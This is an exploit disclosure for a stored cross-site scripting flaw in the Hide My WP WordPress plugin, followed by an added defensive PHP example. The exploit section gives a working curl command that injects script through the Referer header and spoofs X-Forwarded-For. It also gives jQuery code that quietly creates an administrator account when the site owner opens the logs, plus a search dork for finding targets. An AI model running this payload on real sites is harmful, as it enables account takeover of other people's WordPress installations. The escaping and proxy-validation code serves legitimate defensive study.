Nov 2, 2015

[WP] Hide My WP XSS vulnerability

Exploit Title: Hide My WP XSS vulnerability
Date: 20-07-2015
Software Link: http://codecanyon.net/item/hide-my-wp-no-one-can-know-you-use-wordpress/4177158
Version 4.51.1
Google dork: ff957fea/includes/css/style.css
Fix: turn off IDS logging

Description

An attacker can make a fake attack attempt, which will be logged, and use it to inject JavaScript. The attacker can also spoof their IP address in the logs.

Proof of Concept

curl --referer '<script src="//….">  // () { :; };' --header 'X-FORWARDED-FOR: 8.8.8.8' http://example.com

The site's owner will get a notification about the fake attack attempt; when he checks it in the logs, the included JS will run. The attacker can create an admin user in the background with the example JS below.

// Example JS to create admin user:

jQuery('body').prepend('<iframe id="test" style="position:absolute;top:-10000px" src="/wp-admin/user-new.php"></iframe>');
jQuery('#test').load(function(){
    jQuery('#test').contents().find('#user_login').val('pwned');
    jQuery('#test').contents().find('#email').val('[email protected]');

    // Prevent browser prompt "remember password"
    jQuery('#test').contents().find('#pass1').attr('type','text');
    jQuery('#test').contents().find('#pass2').attr('type','text');

    jQuery('#role').val('administrator');

    jQuery('#test').contents().find('#pass1').val('dummypass');
    jQuery('#test').contents().find('#pass2').val('dummypass');
    jQuery('#test').contents().find('#createuser').submit();
});
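
A defensive counterpart to the proof of concept above, added here as an example and not taken from Hide My WP's source: a log viewer that escapes request-derived fields at output time and believes X-Forwarded-For only when the connection comes from a known proxy. The function names, the trusted proxy address and the sample request are assumptions constructed for illustration.

```php
<?php
// Added example: not Hide My WP's code. Function names and the
// trusted-proxy list are assumptions made for illustration.

// Proxies whose X-Forwarded-For header we are willing to believe (assumed).
const TRUSTED_PROXIES = ['10.0.0.5'];

// Pick the address to log. The header is honoured only when the TCP peer
// is a known proxy; otherwise any client could write 8.8.8.8 into the log.
function client_ip(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    $xff  = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($peer, TRUSTED_PROXIES, true)) {
        // The right-most entry is the one our own proxy appended.
        $parts = array_map('trim', explode(',', $xff));
        $candidate = end($parts);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return filter_var($peer, FILTER_VALIDATE_IP) !== false ? $peer : 'invalid';
}

// Render one log row for the admin page. Every request-derived field is
// escaped at output time, so markup in a header is displayed, not executed.
function render_log_row(array $server): string
{
    $e = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<tr><td>' . $e(client_ip($server)) . '</td><td>'
         . $e($server['HTTP_REFERER'] ?? '') . '</td></tr>';
}

// Constructed request: a direct connection from 203.0.113.7 (documentation
// range) carrying a spoofed forwarding header and markup in the Referer.
$request = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => '8.8.8.8',
    'HTTP_REFERER'         => '<script src="//placeholder.invalid/x.js"></script>',
];
echo render_log_row($request), PHP_EOL;
```

In a WordPress plugin the escaping step would normally go through esc_html() rather than calling htmlspecialchars() directly.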
